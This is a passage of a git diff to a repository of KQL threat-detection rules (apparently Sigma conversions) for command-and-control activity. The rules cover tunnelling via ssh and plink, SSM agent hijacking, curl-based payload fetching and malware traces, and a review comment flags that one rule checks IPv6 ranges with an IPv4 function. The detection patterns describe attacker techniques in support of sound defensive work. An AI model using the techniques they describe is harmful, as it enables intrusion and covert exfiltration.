"GoogleDriveFS.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or ((RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz") and (InitiatingProcessFolderPath endswith "\\MEGAsync.exe" or (InitiatingProcessFolderPath contains "\\MEGAsyncSetup32_" and InitiatingProcessFolderPath contains "RC.exe") or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup32.exe" or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup64.exe" or InitiatingProcessFolderPath endswith "\\MEGAupdater.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\midori-ng\\" and 
InitiatingProcessFolderPath endswith "\\Midori Next Generation.exe") or isnull(InitiatingProcessFolderPath) or (RemoteUrl endswith "onedrive.com" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath endswith "\\OneDrive.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (RemoteUrl endswith ".t.me" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\Telegram Desktop\\" and InitiatingProcessFolderPath endswith "\\Telegram.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath 
startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\")) or (RemoteUrl endswith "facebook.com" and InitiatingProcessFolderPath endswith "\\WhatsApp.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\")))))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql
index 06f4adac..377a8332 100644
--- a/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql
+++ b/KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql
@@ -1,12 +1,12 @@
-// Title: Outbound Network Connection Initiated By Script Interpreter
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022-08-28
-// Level: high
-// Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Legitimate scripts
-
-DeviceNetworkEvents
+// Title: Outbound Network Connection Initiated By Script Interpreter
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-28
+// Level: high
+// Description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate scripts
+
+DeviceNetworkEvents
 | where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ipv4_is_in_range(RemoteIP, "20.0.0.0/11"))))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql b/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql
index a99fec95..cc1278d9 100644
--- a/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql
+++ b/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql
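Review bot: The context line closing this hunk passes the IPv6 literals `"::1/128"`, `"fe80::/10"` and `"fc00::/7"` to `ipv4_is_in_range`, which only parses IPv4 and, as far as I recall, returns null when RemoteIP is an IPv6 address; since `or` and `not` propagate null in KQL, the whole `where` predicate becomes null for every IPv6 connection and those events are silently dropped instead of being evaluated. The three IPv6 checks should use `ipv6_is_in_range(RemoteIP, "::1/128")` (and likewise for the other two), and wrapping the exclusion in `coalesce(..., false)` would make an unparseable address fail open to an alert rather than fail closed. This predates the commit, which only touches line endings, and likely comes from the converter backend mapping every Sigma `cidr` modifier to `ipv4_is_in_range`, so the other DeviceNetworkEvents rules are worth a sweep.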
@@ -1,12 +1,12 @@
-// Title: Port Forwarding Activity Via SSH.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-12
-// Level: medium
-// Description: Detects port forwarding activity via SSH.exe
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.lateral-movement, attack.t1572, attack.t1021.001, attack.t1021.004
-// False Positives:
-// - Administrative activity using a remote port forwarding to a local port
-
-DeviceProcessEvents
+// Title: Port Forwarding Activity Via SSH.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-12
+// Level: medium
+// Description: Detects port forwarding activity via SSH.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.lateral-movement, attack.t1572, attack.t1021.001, attack.t1021.004
+// False Positives:
+// - Administrative activity using a remote port forwarding to a local port
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R " or ProcessCommandLine contains " –R " or ProcessCommandLine contains " —R " or ProcessCommandLine contains " ―R ") and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql b/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql
index d7aeff45..4348ae16 100644
--- a/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql
+++ b/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql
@@ -1,12 +1,12 @@
-// Title: Potential Amazon SSM Agent Hijacking
-// Author: Muhammad Faisal
-// Date: 2023-08-02
-// Level: medium
-// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
-// False Positives:
-// - Legitimate activity of system administrators
-
-DeviceProcessEvents
+// Title: Potential Amazon SSM Agent Hijacking
+// Author: Muhammad Faisal
+// Date: 2023-08-02
+// Level: medium
+// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
+// False Positives:
+// - Legitimate activity of system administrators
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql b/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql
index e4aa4b71..1be42575 100644
--- a/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql
+++ b/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql
@@ -1,12 +1,12 @@
-// Title: Potential COM Objects Download Cradles Usage - Process Creation
-// Author: frack113
-// Date: 2022-12-25
-// Level: medium
-// Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-// False Positives:
-// - Legitimate use of the library
-
-DeviceProcessEvents
+// Title: Potential COM Objects Download Cradles Usage - Process Creation
+// Author: frack113
+// Date: 2022-12-25
+// Level: medium
+// Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of the library
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "[Type]::GetTypeFromCLSID(" and (ProcessCommandLine contains "0002DF01-0000-0000-C000-000000000046" or ProcessCommandLine contains "F6D90F16-9C73-11D3-B32E-00C04F990BB4" or ProcessCommandLine contains "F5078F35-C551-11D3-89B9-0000F81FE221" or ProcessCommandLine contains "88d96a0a-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "AFBA6B42-5692-48EA-8141-DC517DCF0EF1" or ProcessCommandLine contains "AFB40FFD-B609-40A3-9828-F88BBE11E4E3" or ProcessCommandLine contains "88d96a0b-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "2087c2f4-2cef-4953-a8ab-66779b670495" or ProcessCommandLine contains "000209FF-0000-0000-C000-000000000046" or ProcessCommandLine contains "00024500-0000-0000-C000-000000000046")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql b/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql
index a0a9fa10..28c36ac5 100644
--- a/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql
+++ b/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql
@@ -1,10 +1,10 @@
-// Title: Potential DLL File Download Via PowerShell Invoke-WebRequest
-// Author: Florian Roth (Nextron Systems), Hieu Tran
-// Date: 2023-03-13
-// Level: medium
-// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.execution, attack.t1059.001, attack.t1105
-
-DeviceProcessEvents
+// Title: Potential DLL File Download Via PowerShell Invoke-WebRequest
+// Author: Florian Roth (Nextron Systems), Hieu Tran
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1059.001, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IRM " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql b/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql
index 90364892..25801352 100644
--- a/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql
+++ b/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql
@@ -1,10 +1,10 @@
-// Title: Potential Download/Upload Activity Using Type Command
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-14
-// Level: medium
-// Description: Detects usage of the "type" command to download/upload data from WebDAV server
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Potential Download/Upload Activity Using Type Command
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-14
+// Level: medium
+// Description: Detects usage of the "type" command to download/upload data from WebDAV server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "type \\\\" and ProcessCommandLine contains " > ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > \\\\")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql b/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql
index 18429419..50020784 100644
--- a/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql
+++ b/KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql
@@ -1,10 +1,10 @@
-// Title: Potential In-Memory Download And Compile Of Payloads
-// Author: Sohan G (D4rkCiph3r), Red Canary (idea)
-// Date: 2023-08-22
-// Level: medium
-// Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.execution, attack.t1059.007, attack.t1105
-
-DeviceProcessEvents
+// Title: Potential In-Memory Download And Compile Of Payloads
+// Author: Sohan G (D4rkCiph3r), Red Canary (idea)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1059.007, attack.t1105
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains "curl"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql b/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql
index 326945dc..6c7f97e0 100644
--- a/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql
+++ b/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql
@@ -1,12 +1,12 @@
-// Title: Potential Linux Amazon SSM Agent Hijacking
-// Author: Muhammad Faisal
-// Date: 2023-08-03
-// Level: medium
-// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
-// False Positives:
-// - Legitimate activity of system administrators
-
-DeviceProcessEvents
+// Title: Potential Linux Amazon SSM Agent Hijacking
+// Author: Muhammad Faisal
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
+// False Positives:
+// - Legitimate activity of system administrators
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "/amazon-ssm-agent"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql b/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql
index bf7e4e9f..187c7cc7 100644
--- a/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql
+++ b/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql
@@ -1,10 +1,10 @@
-// Title: Potential RDP Tunneling Via Plink
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-04
-// Level: high
-// Description: Execution of plink to perform data exfiltration and tunneling
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572
-
-DeviceProcessEvents
+// Title: Potential RDP Tunneling Via Plink
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-04
+// Level: high
+// Description: Execution of plink to perform data exfiltration and tunneling
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ":127.0.0.1:3389" and FolderPath endswith "\\plink.exe") or ((ProcessCommandLine contains ":3389" and FolderPath endswith "\\plink.exe") and (ProcessCommandLine contains " -P 443" or ProcessCommandLine contains " -P 22"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql b/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql
index df83627f..e620dd1d 100644
--- a/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql
+++ b/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql
@@ -1,10 +1,10 @@
-// Title: Potential RDP Tunneling Via SSH
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-12
-// Level: high
-// Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572
-
-DeviceProcessEvents
+// Title: Potential RDP Tunneling Via SSH
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-12
+// Level: high
+// Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ":3389" and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql b/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql
index 346ab1f1..4f983d37 100644
--- a/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql
+++ b/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql
@@ -1,10 +1,10 @@
-// Title: Potential WizardUpdate Malware Infection
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022-10-17
-// Level: high
-// Description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control
-
-DeviceProcessEvents
+// Title: Potential WizardUpdate Malware Infection
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: high
+// Description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "=$(curl " and ProcessCommandLine contains "eval") and FolderPath endswith "/sh") or (ProcessCommandLine contains "_intermediate_agent_" and FolderPath endswith "/curl")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql b/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql
index a84e9188..4669dddd 100644
--- a/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql
+++ b/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql
@@ -1,10 +1,10 @@
-// Title: Potential XCSSET Malware Infection
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022-10-17
-// Level: medium
-// Description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control
-
-DeviceProcessEvents
+// Title: Potential XCSSET Malware Infection
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: medium
+// Description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "/sys/log.php" or ProcessCommandLine contains "/sys/prepod.php" or ProcessCommandLine contains "/sys/bin/Pods") and FolderPath endswith "/curl" and InitiatingProcessFolderPath endswith "/bash") and ProcessCommandLine contains "https://") or (((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/osacompile" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "LSUIElement" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/plutil" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "-r" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/zip"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql b/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql
index eb551610..e3570b2b 100644
--- a/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql
+++ b/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Network Connection To Notion API
-// Author: Gavin Knapp
-// Date: 2023-05-03
-// Level: low
-// Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1102
-// False Positives:
-// - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured.
-
-DeviceNetworkEvents
+// Title: Potentially Suspicious Network Connection To Notion API
+// Author: Gavin Knapp
+// Date: 2023-05-03
+// Level: low
+// Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102
+// False Positives:
+// - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured.
+
+DeviceNetworkEvents
 | where RemoteUrl contains "api.notion.com" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Notion\\Notion.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql
index 788bb520..b5f1787f 100644
--- a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql
+++ b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql
@@ -1,11 +1,11 @@
-// Title: Potentially Suspicious Usage Of Qemu
-// Author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)
-// Date: 2024-06-03
-// Level: medium
-// Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment.
-// Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090, attack.t1572
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Usage Of Qemu
+// Author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)
+// Date: 2024-06-03
+// Level: medium
+// Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment.
+// Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090, attack.t1572
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "-m 1M" or ProcessCommandLine contains "-m 2M" or ProcessCommandLine contains "-m 3M") and (ProcessCommandLine contains "restrict=off" and ProcessCommandLine contains "-netdev " and ProcessCommandLine contains "connect=" and ProcessCommandLine contains "-nographic")) and (not((ProcessCommandLine contains " -cdrom " or ProcessCommandLine contains " type=virt " or ProcessCommandLine contains " -blockdev ")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql b/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql
index 7b43f616..2ad7a4d3 100644
--- a/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql
+++ b/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql
@@ -1,10 +1,10 @@
-// Title: PrintBrm ZIP Creation of Extraction
-// Author: frack113
-// Date: 2022-05-02
-// Level: high
-// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1564.004
-
-DeviceProcessEvents
+// Title: PrintBrm ZIP Creation of Extraction
+// Author: frack113
+// Date: 2022-05-02
+// Level: high
+// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_3proxy_execution.kql b/KQL/rules/Command and Control/pua_3proxy_execution.kql
index 94528c9e..0188a5f2 100644
--- a/KQL/rules/Command and Control/pua_3proxy_execution.kql
+++ b/KQL/rules/Command and Control/pua_3proxy_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - 3Proxy Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-09-13
-// Level: high
-// Description: Detects the use of 3proxy, a tiny free proxy server
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1572
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: PUA - 3Proxy Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects the use of 3proxy, a tiny free proxy server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where FolderPath endswith "\\3proxy.exe" or ProcessCommandLine contains ".exe -i127.0.0.1 -p" or ProcessVersionInfoFileDescription =~ "3proxy - tiny proxy server"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql
index c9f1dbfa..42b48bb0 100644
--- a/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql
+++ b/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Chisel Tunneling Tool Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-09-13
-// Level: high
-// Description: Detects usage of the Chisel tunneling tool via the commandline arguments
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1090.001
-// False Positives:
-// - Some false positives may occur with other tools with similar commandlines
-
-DeviceProcessEvents
+// Title: PUA - Chisel Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects usage of the Chisel tunneling tool via the commandline arguments
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Some false positives may occur with other tools with similar commandlines
+
+DeviceProcessEvents
